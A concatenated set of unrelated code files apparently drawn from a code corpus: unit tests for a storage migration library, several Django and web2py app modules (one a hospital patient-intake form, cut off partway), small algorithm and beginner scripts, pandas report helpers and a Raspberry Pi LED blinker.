        assert_that(ms.dest_lu_id, equal_to(1))
        assert_that(ms.dest_lu_name, equal_to('LUN 1'))
        assert_that(ms.migration_rate, equal_to(VNXMigrationRate.HIGH))
        assert_that(ms.percent_complete, equal_to(50.0))
        assert_that(ms.time_remaining, equal_to('0 second(s)'))
        assert_that(ms.current_state, equal_to('MIGRATING'))
        assert_that(ms.is_migrating, equal_to(True))
        assert_that(ms.is_success, equal_to(False))
        assert_that(ms.existed, equal_to(True))
    @patch_cli
    def test_source_lun(self):
        ms = VNXMigrationSession(0, t_cli())
        lun = ms.source_lun
        assert_that(lun, instance_of(VNXLun))
        # NOTE(review): get_id is called with the lun passed explicitly --
        # presumably a static-style helper on VNXLun; confirm in storops.
        assert_that(lun.get_id(lun), equal_to(ms.source_lu_id))
    @patch_cli
    def test_destination_lun(self):
        ms = VNXMigrationSession(0, t_cli())
        lun = ms.destination_lun
        assert_that(lun, instance_of(VNXLun))
        assert_that(lun.get_id(lun), equal_to(ms.dest_lu_id))
    @patch_cli
    def test_get_all(self):
        ms_list = VNXMigrationSession.get(t_cli())
        assert_that(len(ms_list), equal_to(2))
    @patch_cli(output='migrate_-list_none.txt')
    def test_get_all_none(self):
        # Fixture in which no migration sessions are listed.
        ms_list = VNXMigrationSession.get(t_cli())
        assert_that(len(ms_list), equal_to(0))
    @patch_cli
    def test_get_no_session(self):
        # A LUN with no session reports not-migrating / success.
        ms = VNXMigrationSession(10, t_cli())
        assert_that(ms.existed, equal_to(False))
        assert_that(ms.is_migrating, equal_to(False))
        assert_that(ms.is_success, equal_to(True))
    @patch_cli
    def test_get_lun_not_exists(self):
        ms = VNXMigrationSession(1234, t_cli())
        assert_that(ms.existed, equal_to(False))
    @patch_cli
    def test_cancel_migrate(self):
        # cancel() on a non-migrating session must raise with this message.
        def f():
            ms = VNXMigrationSession(0, t_cli())
            ms.cancel()
        assert_that(f, raises(VNXLunNotMigratingError,
                              'not currently migrating'))
    @patch_cli
    def test_cancel_migrate_sync_completed(self):
        def f():
            ms = VNXMigrationSession(1, t_cli())
            ms.cancel()
        assert_that(f, raises(VNXLunSyncCompletedError,
                              'because data sychronization is completed'))
|
994,249 | 5518a9fa27ee3455ca76b9c7e5f42abc34048a22 | from django.db import models
from django.contrib.auth.models import User
from django.contrib.auth import get_user_model
# Create your models here.
class Tag(models.Model):
    """A label attachable to questions (see Question.tags, many-to-many)."""
    # Human-readable tag text, shown in the admin via __str__.
    tagname = models.CharField(max_length=50)
    def __str__(self):
        return self.tagname
class Question(models.Model):
    """A practice question: links, difficulty, summary, tags and authorship."""
    # (stored value, display label) pairs for the difficulty choice field.
    difficulties = [
        ('B',"Beginner"),
        ("E","Easy"),
        ("M","Medium"),
        ("H","Hard"),
    ]
    questionName = models.CharField(max_length=100)
    difficulty = models.CharField(choices = difficulties, max_length=50)
    questionLink = models.URLField(max_length=500)
    solutionLink = models.URLField(max_length=500)
    summary = models.TextField()
    # Questions are deleted together with their author's account (CASCADE).
    addedBy = models.ForeignKey(get_user_model(), on_delete=models.CASCADE)
    # addedOn is set once at creation; lastModified refreshes on every save.
    addedOn = models.DateTimeField(auto_now=False, auto_now_add=True)
    lastModified = models.DateTimeField(auto_now=True, auto_now_add=False)
    tags = models.ManyToManyField(Tag)
    def __str__(self):
        return self.questionName
|
994,250 | a0e5bd3d5480e6ac6d76a92eaf9960fe156584b4 | ## 문제: https://leetcode.com/problems/combination-sum/
## 풀이: dfs, 백트래킹
## Runtime: 32 ms, faster than 99.17% of Python online submissions for Combination Sum.
## sort candidates -> makes possible stop early
class Solution(object):
    """LeetCode 39 (Combination Sum) via backtracking over sorted candidates."""
    def combinationSum(self, candidates, target):
        """Return every combination (with repetition) of candidates summing
        to target. Sorting enables pruning: once a candidate exceeds the
        remaining amount, no later candidate can fit either.
        """
        candidates.sort()  # in place, as before: enables the early cut-off
        found = []
        path = []
        def backtrack(start, remaining):
            if remaining == 0:
                found.append(path[:])  # snapshot the current combination
                return
            for idx in range(start, len(candidates)):
                value = candidates[idx]
                if value > remaining:
                    break  # sorted candidates: everything after is too big
                path.append(value)
                backtrack(idx, remaining - value)  # idx again: reuse allowed
                path.pop()
        backtrack(0, target)
        return found
|
994,251 | 38272ce20969159475c891746f85c4f6375fbeed | print('-=-=-=-=- Fatorial -=-=-=-=-\n')
# Read the number whose factorial will be computed.
num0 = int(input('Número = '))
num = num0
# Factorials of negatives are undefined: fall back to the absolute value.
if num0 < 0:
    num = - num0
    print('O número dado é negativo, continuaremos com seu módulo: |{}| = {}' .format(num0, num))
    num0 = num
fat = 1
# Print the expansion "n! = n x n-1 x ... x 1" while accumulating the product.
print('{}! = ' .format(num0), end='')
while num >= 1:
    fat = fat * num
    print('{}' .format(num), end='')
    # separator only between factors, never after the last one
    print(' x ' if num > 1 else '', end='')
    num += -1
print(' = {}' .format(fat))
# Leftover calculator snippet kept by the author as dead code.
'''
if i == '1':
    print('{} + {} = {}' .format(num1, num2, num1 + num2))
elif i == '2':
    print('{} - {} = {}' .format(num1, num2, num1 - num2))
elif i == '3':
    print('{} x {} = {}' .format(num1, num2, num1 * num2))
else:
    print('{} % {} = {}' .format(num1, num2, num1 / num2))
'''
def calculate_apr(principal, interest_rate, years):
    """Compound *principal* at *interest_rate* once per year for *years* years.

    Returns the final balance formatted as a string, or ``False`` when any
    input is invalid: ``principal`` and ``interest_rate`` must be int or
    float, ``years`` must be an int, and all three must be non-negative.

    Fixes vs. the original: both ``if`` headers were missing their colons
    (syntax errors), and negative inputs fell through to an implicit ``None``
    instead of ``False``.
    """
    numeric = (int, float)
    # Type check first, so the comparisons below cannot raise on bad types.
    if not (isinstance(principal, numeric)
            and isinstance(interest_rate, numeric)
            and isinstance(years, int)):
        return False
    # All values must be non-negative.
    if principal < 0 or interest_rate < 0 or years < 0:
        return False
    for _ in range(years):
        principal = principal * (1 + interest_rate)
    return f'{principal}'
|
994,253 | 29ae7e7f96b95ee9f78b443039779534840e19f5 | from setup import BASE_DIR
from setup import ENGINE
from setup import DataFrame
from setup import datetime
from setup import pd
from setup import re
"""Used for loading stop words and input files, and for writing to export files."""
def load_stop_words() -> list:
    """Load the manually curated stop-word file (one word per line).

    The file lives under ENGINE and is expected to grow over time; every
    entry is normalised to UPPER case before being returned.
    """
    with open(f'{ENGINE}/stop_words.txt', 'r') as handle:
        raw_words = handle.read().splitlines()
    return [word.upper() for word in raw_words]
def make_stop_words_pattern(stop_words: list) -> re.Pattern:
    """Compile the stop words into one alternation regex for fast checks."""
    # Escape regex metacharacters in each word (e.g. "." -> "\."), then join
    # them with "|" so a single search covers the whole list.
    alternation = '|'.join(re.escape(word) for word in stop_words)
    return re.compile(alternation)
def to_upper(df: DataFrame) -> DataFrame:
    """Upper-case every string ('object' dtype) column; leave others alone."""
    def _upper_if_text(column):
        # Only object-dtype columns support the .str accessor here.
        return column.str.upper() if column.dtype == 'object' else column
    return df.apply(_upper_if_text)
def strip_columns(df: DataFrame) -> DataFrame:
    """Trim surrounding whitespace from every string ('object') column."""
    def _strip_if_text(column):
        return column.str.strip() if column.dtype == 'object' else column
    return df.apply(_strip_if_text)
def prepare_input_df(df: DataFrame) -> DataFrame:
    """Standard cleanup for every input file: blank-fill, upper-case, strip."""
    cleaned = df.fillna('')        # replace np.nan with empty strings
    cleaned = to_upper(cleaned)    # normalise case across all text columns
    return strip_columns(cleaned)  # drop stray surrounding whitespace
def get_flat_file_data(kind: str, server: str='PROD', ID: str='42') -> DataFrame:
    """Load a source CSV and apply the standard preparation.

    kind 'c' selects the customer export, 'b' the vendor export; the
    filename template only varies by *server* and *ID*.
    """
    templates = {
        'c': 'customer_data_{0}_{1}_.csv',
        'b': 'vendor_data_{0}_{1}_.csv'
    }
    filename = templates[kind].format(server, ID)
    raw = pd.read_csv(f'{BASE_DIR}/{filename}', encoding='UTF-8')
    return prepare_input_df(raw)
def get_export_columns(kind: str) -> dict:
    """Map working-DataFrame column names to report-friendly labels.

    The unmatched ('u') columns are always included; kind 'm' (matched)
    extends them with the email/name columns, since the matched DataFrame
    carries every unmatched column plus those three.
    """
    columns = {
        'vendor_name': 'Vendor Name',
        'number': 'Number',
        'name': 'Name',
        'assoc': 'Assocciated'
    }
    if kind == 'm':
        columns.update({
            'email_address': 'Email Address',
            'first_name': 'First Name',
            'last_name': 'Last Name'
        })
    return columns
def prepare_output_df(df: DataFrame, kind: str) -> DataFrame:
    """Keep only the export columns for *kind* and rename them for the report."""
    keep = get_export_columns(kind)
    # Drop every working column that is not part of the export mapping.
    surplus = [col for col in df.columns.to_list() if col not in keep.keys()]
    return df.drop(columns=surplus).rename(columns=keep)
def create_report(m_df: DataFrame, u_df: DataFrame, server: str='JEFF', ID: str='11', date=None):
    """Write the matched/unmatched report workbook.

    m_df := Matched DataFrame.
    u_df := Unmatched DataFrame.
    date := timestamp embedded in the filename; defaults to "now".

    Fix: the original default was ``datetime.now().strftime(...)`` evaluated
    once at import time, so every report produced by a long-running process
    shared the same timestamp. Computing it per call restores the intended
    behaviour; explicit ``date`` arguments behave exactly as before.
    """
    if date is None:
        date = datetime.now().strftime('%Y%m%d %H%M%S')
    m_df = prepare_output_df(m_df, 'm')
    u_df = prepare_output_df(u_df, 'u')
    with pd.ExcelWriter(f'{BASE_DIR}/report_{server}_{ID}_{date}.xlsx') as o:
        m_df.to_excel(o, sheet_name='Matched', index=False)
        u_df.to_excel(o, sheet_name='Unmatched', index=False)
# Built once at import time so every caller shares the same list and pattern.
STOP_WORDS = load_stop_words() # Load the stop words into a CONSTANT list. This will be used later.
STOP_WORDS_PATTERN = make_stop_words_pattern(STOP_WORDS) # Turn the stop words into a CONSTANT pattern. This will be used later.
994,254 | 28756cfbb1db8223d1fe0d6036f858459eff19e7 | # -*- coding: utf-8 -*-
import RPi.GPIO as GPIO
import time
# Blink two LEDs on BCM pins 17/18 in an alternating pattern, COUNT times,
# speeding up every cycle as the delay `a` shrinks by 0.05 s per iteration.
a = 0.5
COUNT = 10
PIN1 = 17
PIN2 = 18
GPIO.setmode(GPIO.BCM)
GPIO.setup(PIN1, GPIO.OUT)
GPIO.setup(PIN2, GPIO.OUT)
try:
    # `range` instead of the Python-2-only `xrange`: identical iteration here,
    # and the script now also runs under Python 3.
    for _ in range(COUNT):
        GPIO.output(PIN1, True)
        time.sleep(a)
        GPIO.output(PIN2, True)
        time.sleep(a)
        GPIO.output(PIN1, False)
        time.sleep(a)
        GPIO.output(PIN2, False)
        time.sleep(a)
        a = a - 0.05
finally:
    # Always release the pins, even on Ctrl-C or an error mid-blink --
    # the original skipped cleanup whenever the loop was interrupted.
    GPIO.cleanup()
|
994,255 | f621828920dac78610549345e0128ba9c2d67047 | from django.urls import path, re_path
from django.conf.urls import url
from . import views
# URL namespace: reverse these routes as 'blog:index' / 'blog:detail'.
app_name = 'blog'
# Site root -> index view; any slug of word chars or hyphens with a
# trailing slash -> detail view (slug passed as keyword argument).
urlpatterns = [
    path('', views.index, name='index'),
    re_path(r'^(?P<slug>[\w-]+)/$', views.detail, name='detail')
]
|
994,256 | f12df0f66c266449bb4dc25d2395997b7ddda20a | N = int(input())
A = list(map(int, input().split()))
amax = max(A)
max_idx = A.index(amax)
amin = min(A)
min_idx = A.index(amin)
ans_list = []
if amax*amin < 0:
if abs(amax) >= abs(amin):
for i in range(N):
A[i] += amax
ans_list.append([max_idx+1, i+1])
else:
for i in range(N):
A[i] += amin
ans_list.append([min_idx+1, i+1])
# print(A)
amax = max(A)
amin = min(A)
if amax > 0:
for i in range(N-1):
ans_list.append([i+1, i+2])
elif amin < 0:
for i in range(N-1, 0, -1):
ans_list.append([i+1, i])
print(len(ans_list))
for i in range(len(ans_list)):
print(*ans_list[i])
|
994,257 | 903ffdf15faca6d4304372d4b38fe5908d60089e | # Generated by Django 3.0.3 on 2021-03-19 17:22
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated (Django 3.0.3): adds Telegram.confirm_paid and updates
    the confirm_paid help_text on Instagram and WhatsApp.

    Generated file -- do not hand-edit the operations.
    """
    dependencies = [
        ('users', '0014_auto_20210319_2156'),
    ]
    operations = [
        migrations.AddField(
            model_name='telegram',
            name='confirm_paid',
            field=models.BooleanField(default=False, help_text='do not fill this field'),
        ),
        migrations.AlterField(
            model_name='instagram',
            name='confirm_paid',
            field=models.BooleanField(default=False, help_text='do not fill this field'),
        ),
        migrations.AlterField(
            model_name='whatsapp',
            name='confirm_paid',
            field=models.BooleanField(default=False, help_text='do not fill this field'),
        ),
    ]
|
994,258 | 931e2020d6d0588ef117ef96c829515537d352b1 | __author__ = 'Mohamed'
import sys
import json
import cgi
def gerar_campos_busca():
    """Build the web2py search FORM: a radio choice between searching by
    name or by registry number, the two matching text inputs, a submit
    button, and two hidden fields (search-choice and id) used by the
    client-side logic."""
    campos = FORM(
        DIV(_id='div_campos_busca_geral',
            *FIELDSET(
                LEGEND(_id='lgd_campos_busca_geral',
                    *'BUSCA'),
                INPUT(_type='radio', _id='chk_busca_1', _name='chk_busca'),
                'Nome: ',
                INPUT(_type='text', _id='nome_busca', _name='nome_busca'),
                BR(),
                INPUT(_type='radio', _id='chk_busca_2', _name='chk_busca'),
                'Nr Registro: ',
                INPUT(_type='text', _id='nr_registro_busca', _name='nr_registro_busca'),
                BR(),
                BR(),
                INPUT(_type='submit', _value='BUSCAR', _id='btn_buscar'),
                INPUT(_type='hidden', _id='campo_hidden_escolha_busca', _name='campo_hidden_escolha_busca'),
                INPUT(_type='hidden', _id='campo_hidden_id_busca', _name='campo_hidden_id_busca')
            )
        )
    )
    return campos
def consulta_nome(nome):
    """Return patient rows whose name contains *nome* (SQL LIKE substring match)."""
    linhas = db(db.paciente.nome.like('%' + nome + '%')).select()
    return linhas
def consulta_registro(registro):
    """Return patient rows whose registry number equals *registro* exactly."""
    linhas = db(db.paciente.nr_registro == registro).select()
    return linhas
def conta_consulta(dado, selecao):
    """Count patient rows matching *dado*.

    selecao == 1 compares against the name column, selecao == 2 against the
    registry number; any other value yields '' (matching the original's
    untouched initial value).
    """
    if selecao == 1:
        return db(db.paciente.nome == dado).count()
    if selecao == 2:
        return db(db.paciente.nr_registro == dado).count()
    return ''
def carrega_dados():
query = db(db.paciente.id == request.vars.id).select()
for dados in query:
campos = FORM(
DIV(_id='div_geral',
*DIV(
DIV(
FIELDSET(
LEGEND(_id='carregar_lgd_dados_gerais',
*'DADOS GERAIS'
),
'Nr Registro:',
INPUT(_type='hidden', _id='carregar_hidden_nr_registro', _name='carregar_hidden_nr_registro', _value=dados.nr_registro),
INPUT(_id='carregar_nr_registro', _name='carregar_nr_registro', _value=dados.nr_registro),
'Matricula HUGG:',
INPUT(_type='hidden', _id='carregar_hidden_matricula_hugg', _name='carregar_hidden_matricula_hugg', _value=dados.matricula_hugg),
INPUT(_id='carregar_matricula_hugg', _name='carregar_matricula_hugg', _value=dados.matricula_hugg),
BR(),
'Nome: ',
INPUT(_type='hidden', _id='carregar_hidden_nome', _name='carregar_hidden_nome', _value=dados.nome),
INPUT(_id='carregar_nome', _name='carregar_nome', _value=dados.nome),
'Data: ',
INPUT(_type='hidden', _id='carregar_hidden_data', _name='carregar_hidden_data', _value=dados.data),
INPUT(_id='carregar_data', _name='carregar_data', _value=dados.data),
'Ficha Nr: ',
INPUT(_type='hidden', _id='carregar_hidden_ficha_nr', _name='carregar_hidden_ficha_nr', _value=dados.ficha_nr),
INPUT(_id='carregar_ficha_nr', _name='carregar_ficha_nr', _value=dados.ficha_nr),
BR(),
'Enf:',
INPUT(_type='hidden', _id='carregar_hidden_enfermaria', _name='carregar_hidden_enfermaria', _value=dados.enfermaria),
INPUT(_id='carregar_enfermaria', _name='carregar_enfermaria', _value=dados.enfermaria),
'Leito:',
INPUT(_type='hidden', _id='carregar_hidden_leito', _name='carregar_hidden_leito', _value=dados.leito),
INPUT(_id='carregar_leito', _name='carregar_leito', _value=dados.leito),
BR(),
'Idade:',
INPUT(_type='hidden', _id='carregar_hidden_idade', _name='carregar_hidden_idade', _value=dados.idade),
INPUT(_id='carregar_idade', _name='carregar_idade', _value=dados.idade),
'ASA:',
INPUT(_type='hidden', _id='carregar_hidden_asa', _name='carregar_hidden_asa', _value=dados.asa),
INPUT(_id='carregar_asa', _name='carregar_asa', _value=dados.asa),
'Clinica:',
INPUT(_type='hidden', _id='carregar_hidden_clinica', _name='carregar_hidden_clinica', _value=dados.clinica),
INPUT(_id='carregar_clinica', _name='carregar_clinica', _value=dados.clinica),
'SO:',
INPUT(_type='hidden', _id='carregar_hidden_so', _name='carregar_hidden_so', _value=dados.so),
INPUT(_id='carregar_so', _name='carregar_so', _value=dados.so),
DIV(_id='carregar_div_e',
*FIELDSET(
'E:',
INPUT(_type='hidden', _id='carregar_hidden_e', _name='carregar_hidden_e', _value=dados.dados_cadastrais_e),
INPUT(_id='carregar_radio_dados_cadastrais_e_sim',
_type='radio',
_name='carregar_dados_cadastrais_e',
_value='T'),
'sim',
INPUT(_id='carregar_radio_dados_cadastrais_e_nao',
_type='radio',
_name='carregar_dados_cadastrais_e',
_value='F'),
'não',
)
),
'Sexo:',
INPUT(_type='hidden', _id='carregar_hidden_sexo', _name='carregar_hidden_sexo', _value=dados.dados_cadastrais_sexo),
INPUT(_id='carregar_radio_sexo_f',
_type='radio',
_name='carregar_dados_cadastrais_sexo',
_value='F'),
'F',
INPUT(_id='carregar_radio_sexo_m',
_type='radio',
_name='carregar_dados_cadastrais_sexo',
_value='M'),
'M',
BR(),
'Altura:',
INPUT(_type='hidden', _id='carregar_hidden_altura', _name='carregar_hidden_altura', _value=dados.altura),
INPUT(_id='carregar_altura', _name='carregar_altura', _value=dados.altura),
'Peso:',
INPUT(_type='hidden', _id='carregar_hidden_peso', _name='carregar_hidden_peso', _value=dados.peso),
INPUT(_id='carregar_peso', _name='carregar_peso', _value=dados.peso),
'Temp:',
INPUT(_type='hidden', _id='carregar_hidden_temperatura', _name='carregar_hidden_temperatura', _value=dados.temperatura),
INPUT(_id='carregar_temperatura', _name='carregar_temperatura', _value=dados.temperatura),
'Pulso:',
INPUT(_type='hidden', _id='carregar_hidden_pulso', _name='carregar_hidden_pulso', _value=dados.pulso),
INPUT(_id='carregar_pulso', _name='carregar_pulso', _value=dados.pulso),
'Resp.:',
INPUT(_type='hidden', _id='carregar_hidden_respiracao', _name='carregar_hidden_respiracao', _value=dados.respiracao),
INPUT(_id='carregar_respiracao', _name='carregar_respiracao', _value=dados.respiracao),
'PA:',
INPUT(_type='hidden', _id='carregar_hidden_pa', _name='carregar_hidden_pa', _value=dados.pa),
INPUT(_id='carregar_pa', _name='carregar_pa', _value=dados.pa),
HR(),
'Diagnóstico',
INPUT(_type='hidden', _id='carregar_hidden_diagnostico', _name='carregar_hidden_diagnostico', _value=dados.diagnostico),
INPUT(_type='text', _id='carregar_diagnostico', _name='carregar_diagnostico', _value=dados.diagnostico),
'Cirurgia',
INPUT(_type='hidden', _id='carregar_hidden_dados_cirurgia_anterior', _name='carregar_hidden_dados_cirurgia_anterior', _value=dados.dados_cirurgia_anterior),
INPUT(_type='text', _id='carregar_dados_cirurgia_anterior', _name='carregar_dados_cirurgia_anterior', _value=dados.dados_cirurgia_anterior),
HR(),
DIV(_id='carregar_div_respiratorio',
*FIELDSET(
LEGEND('RESPIRATÓRIO',
_id='carregar_lgd_respiratorio'),
TABLE(
TR(
TD(
'Tabagismo',
INPUT(_type='hidden', _id='carregar_hidden_tabagismo', _name='carregar_hidden_tabagismo', _value=dados.tabagismo),
INPUT(_id='carregar_radio_tabag_sim',
_type='radio',
_name='carregar_tabagismo',
_value='T'),
'sim',
INPUT(_id='carregar_radio_tabag_nao',
_type='radio',
_name='carregar_tabagismo',
_value='F'),
'não',
BR(),
'Asma',
INPUT(_type='hidden', _id='carregar_hidden_asma', _name='carregar_hidden_asma', _value=dados.asma),
INPUT(_id='carregar_radio_asma_sim',
_type='radio',
_name='carregar_asma',
_value='T'),
'sim',
INPUT(_id='carregar_radio_asma_nao',
_type='radio',
_name='carregar_asma',
_value='F'),
'não',
BR(),
'Tosse / Expectoração',
INPUT(_type='hidden', _id='carregar_hidden_tosse', _name='carregar_hidden_tosse', _value=dados.tosse),
INPUT(_id='carregar_radio_tosse_sim',
_type='radio',
_name='carregar_tosse',
_value='T'),
'sim',
INPUT(_id='carregar_radio_tosse_nao',
_type='radio',
_name='carregar_tosse',
_value='F'),
'não',
BR(),
'DPOC / Bronquiectasia',
INPUT(_type='hidden', _id='carregar_hidden_dpoc', _name='carregar_hidden_dpoc', _value=dados.dpoc),
INPUT(_id='carregar_radio_dpoc_sim',
_type='radio',
_name='carregar_dpoc',
_value='T'),
'sim',
INPUT(_id='carregar_radio_dpoc_nao',
_type='radio',
_name='carregar_dpoc',
_value='F'),
'não',
BR(),
'BK/Insuf. Respiratória',
INPUT(_type='hidden', _id='carregar_hidden_bk_insuficiencia', _name='carregar_hidden_bk_insuficiencia', _value=dados.bk_insuficiencia),
INPUT(_id='carregar_radio_bk_sim',
_type='radio',
_name='carregar_bk_insuficiencia',
_value='T'),
'sim',
INPUT(_id='carregar_radio_bk_nao',
_type='radio',
_name='carregar_bk_insuficiencia',
_value='F'),
'não',
BR(),
'Derrame pleural / Emplema',
INPUT(_type='hidden', _id='carregar_hidden_derrame_pleural', _name='carregar_hidden_derrame_pleural', _value=dados.derrame_pleural),
INPUT(_id='carregar_radio_der_pleural_sim',
_type='radio',
_name='carregar_derrame_pleural',
_value='T'),
'sim',
INPUT(_id='carregar_radio_der_pleural_nao',
_type='radio',
_name='carregar_derrame_pleural',
_value='F'),
'não',
BR(),
'Cir. Torácica',
INPUT(_type='hidden', _id='carregar_hidden_circunferencia_toraxica', _name='carregar_hidden_circunferencia_toraxica', _value=dados.circunferencia_toraxica),
INPUT(_id='carregar_radio_circ_tor_sim',
_type='radio',
_name='carregar_circunferencia_toraxica',
_value='T'),
'sim',
INPUT(_id='carregar_radio_circ_tor_nao',
_type='radio',
_name='carregar_circunferencia_toraxica',
_value='F'),
'não',
)
)
)
)
),
DIV(_id='carregar_div_cardiovascular',
*FIELDSET(
LEGEND(_id='carregar_lgd_cardiovascular',
*'CARDIOVASCULAR'),
TABLE(
TR(
TD(
'HAS',
INPUT(_type='hidden', _id='carregar_hidden_has', _name='carregar_hidden_has', _value=dados.has),
INPUT(_id='carregar_radio_has_sim',
_type='radio',
_name='carregar_has',
_value='T'),
'sim',
INPUT(_id='carregar_radio_has_nao',
_type='radio',
_name='carregar_has',
_value='F'),
'não',
BR(),
'ICC',
INPUT(_type='hidden', _id='carregar_hidden_icc', _name='carregar_hidden_icc', _value=dados.icc),
INPUT(_id='carregar_radio_icc_sim',
_type='radio',
_name='carregar_icc',
_value='T'),
'sim',
INPUT(_id='carregar_radio_icc_nao',
_type='radio',
_name='carregar_icc',
_value='F'),
'não',
BR(),
'Anglina',
INPUT(_type='hidden', _id='carregar_hidden_anglina', _name='carregar_hidden_anglina', _value=dados.anglina),
INPUT(_id='carregar_radio_anglina_sim',
_type='radio',
_name='carregar_anglina',
_value='T'),
'sim',
INPUT(_id='carregar_radio_anglina_nao',
_type='radio',
_name='carregar_anglina',
_value='F'),
'não',
BR(),
'IAM',
INPUT(_type='hidden', _id='carregar_hidden_iam', _name='carregar_hidden_iam', _value=dados.iam),
INPUT(_id='carregar_radio_iam_sim',
_type='radio',
_name='carregar_iam',
_value='T'),
'sim',
INPUT(_id='carregar_radio_iam_nao',
_type='radio',
_name='carregar_iam',
_value='F'),
'não',
BR(),
'Valvulopalla',
INPUT(_type='hidden', _id='carregar_hidden_valvulopalla', _name='carregar_hidden_valvulopalla', _value=dados.valvulopalla),
INPUT(_id='carregar_radio_valvulopalla_sim',
_type='radio',
_name='carregar_valvulopalla',
_value='T'),
'sim',
INPUT(_id='carregar_radio_valvulopalla_nao',
_type='radio',
_name='carregar_valvulopalla',
_value='F'),
'não',
BR(),
'Marcapasso',
INPUT(_type='hidden', _id='carregar_hidden_marcapasso', _name='carregar_hidden_marcapasso', _value=dados.marcapasso),
INPUT(_id='carregar_radio_marcapasso_sim',
_type='radio',
_name='carregar_marcapasso',
_value='T'),
'sim',
INPUT(_id='carregar_radio_marcapasso_nao',
_type='radio',
_name='carregar_marcapasso',
_value='F'),
'não',
BR(),
'Arritmias',
INPUT(_type='hidden', _id='carregar_hidden_arritmias', _name='carregar_hidden_arritmias', _value=dados.arritmias),
INPUT(_id='carregar_radio_arritmias_sim',
_type='radio',
_name='carregar_arritmias',
_value='T'),
'sim',
INPUT(_id='carregar_radio_arritmias_nao',
_type='radio',
_name='carregar_arritmias',
_value='F'),
'não',
BR(),
'Insuf. Venosa',
INPUT(_type='hidden', _id='carregar_hidden_insuf_venosa', _name='carregar_hidden_insuf_venosa', _value=dados.insuf_venosa),
INPUT(_id='carregar_radio_insuf_venosa_sim',
_type='radio',
_name='carregar_insuf_venosa',
_value='T'),
'sim',
INPUT(_id='carregar_radio_insuf_venosa_nao',
_type='radio',
_name='carregar_insuf_venosa',
_value='F'),
'não',
)
)
)
)
),
BR(),
FIELDSET(
LEGEND(_id='carregar_lgd_outros',
*'Outros'),
DIV(_id='carregar_div_outros_esq',
*TABLE(
TR(
TD(
'Diabetes: ',
INPUT(_type='hidden', _id='carregar_hidden_diabetes', _name='carregar_hidden_diabetes', _value=dados.diabetes),
INPUT(_id='carregar_radio_diabetes_sim',
_type='radio',
_name='carregar_diabetes',
_value='T'),
'sim',
INPUT(_id='carregar_radio_diabetes_nao',
_type='radio',
_name='carregar_diabetes',
_value='F'),
'não',
BR(),
'Hipertireoidismo: ',
INPUT(_type='hidden', _id='carregar_hidden_hipertireoidismo', _name='carregar_hidden_hipertireoidismo', _value=dados.hipertireoidismo),
INPUT(_id='carregar_radio_hipertireoidismo_sim',
_type='radio',
_name='carregar_hipertireoidismo',
_value='T'),
'sim',
INPUT(_id='carregar_radio_hipertireoidismo_nao',
_type='radio',
_name='carregar_hipertireoidismo',
_value='F'),
'não',
BR(),
'Endocrinopalias: ',
INPUT(_type='hidden', _id='carregar_hidden_endocrinopalias', _name='carregar_hidden_endocrinopalias', _value=dados.endocrinopalias),
INPUT(_id='carregar_radio_endocrinopalias_sim',
_type='radio',
_name='carregar_endocrinopalias',
_value='T'),
'sim',
INPUT(_id='carregar_radio_endocrinopalias_nao',
_type='radio',
_name='carregar_endocrinopalias',
_value='F'),
'não',
BR(),
'Cirrose: ',
INPUT(_type='hidden', _id='carregar_hidden_cirrose', _name='carregar_hidden_cirrose', _value=dados.cirrose),
INPUT(_id='carregar_radio_cirrose_sim',
_type='radio',
_name='carregar_cirrose',
_value='T'),
'sim',
INPUT(_id='carregar_radio_cirrose_nao',
_type='radio',
_name='carregar_cirrose',
_value='F'),
'não',
BR(),
'Hepatite A: ',
INPUT(_type='hidden', _id='carregar_hidden_hepatite_a', _name='carregar_hidden_hepatite_a', _value=dados.hepatite_a),
INPUT(_id='carregar_radio_hepa_sim',
_type='radio',
_name='carregar_hepatite_a',
_value='T'),
'sim',
INPUT(_id='carregar_radio_hepa_nao',
_type='radio',
_name='carregar_hepatite_a',
_value='F'),
'não',
BR(),
'Hepatite B: ',
INPUT(_type='hidden', _id='carregar_hidden_hepatite_b', _name='carregar_hidden_hepatite_b', _value=dados.hepatite_b),
INPUT(_id='carregar_radio_hepb_sim',
_type='radio',
_name='carregar_hepatite_b',
_value='T'),
'sim',
INPUT(_id='carregar_radio_hepb_nao',
_type='radio',
_name='carregar_hepatite_b',
_value='F'),
'não',
BR(),
'Hepatite C: ',
INPUT(_type='hidden', _id='carregar_hidden_hepatite_c', _name='carregar_hidden_hepatite_c', _value=dados.hepatite_c),
INPUT(_id='carregar_radio_hepc_sim',
_type='radio',
_name='carregar_hepatite_c',
_value='T'),
'sim',
INPUT(_id='carregar_radio_hepc_nao',
_type='radio',
_name='carregar_hepatite_c',
_value='F'),
'não',
BR(),
'Elilismo: ',
INPUT(_type='hidden', _id='carregar_hidden_elilismo', _name='carregar_hidden_elilismo', _value=dados.elilismo),
INPUT(_id='carregar_radio_elilismo_sim',
_type='radio',
_name='carregar_elilismo',
_value='T'),
'sim',
INPUT(_id='carregar_radio_elilismo_nao',
_type='radio',
_name='carregar_elilismo',
_value='F'),
'não',
BR(),
'HIV / SIDA: ',
INPUT(_type='hidden', _id='carregar_hidden_hiv', _name='carregar_hidden_hiv', _value=dados.hiv),
INPUT(_id='carregar_radio_hiv_sim',
_type='radio',
_name='carregar_hiv',
_value='T'),
'sim',
INPUT(_id='carregar_radio_hiv_nao',
_type='radio',
_name='carregar_hiv',
_value='F'),
'não',
BR(),
'Infecções Oportunistas: ',
INPUT(_type='hidden', _id='carregar_hidden_infeccoes_oportunistas', _name='carregar_hidden_infeccoes_oportunistas', _value=dados.infeccoes_oportunistas),
INPUT(_id='carregar_radio_inf_opor_sim',
_type='radio',
_name='carregar_infeccoes_oportunistas',
_value='T'),
'sim',
INPUT(_id='carregar_radio_inf_opor_nao',
_type='radio',
_name='carregar_infeccoes_oportunistas',
_value='F'),
'não',
)
),
)
),
DIV(_id='carregar_div_outros_centro',
*TABLE(
*TR(
TD(
TD(
'Insuf. Renal: ',
INPUT(_type='hidden', _id='carregar_hidden_insuf_renal', _name='carregar_hidden_insuf_renal', _value=dados.insuf_renal),
INPUT(_id='carregar_radio_insuf_renal_sim',
_type='radio',
_name='carregar_insuf_renal',
_value='T'),
'sim',
INPUT(_id='carregar_radio_insuf_renal_nao',
_type='radio',
_name='carregar_insuf_renal',
_value='F'),
'não',
BR(),
'Hemod. Diálise Peritoneal: ',
INPUT(_type='hidden', _id='carregar_hidden_hemodialise_peritoneal', _name='carregar_hidden_hemodialise_peritoneal', _value=dados.hemodialise_peritoneal),
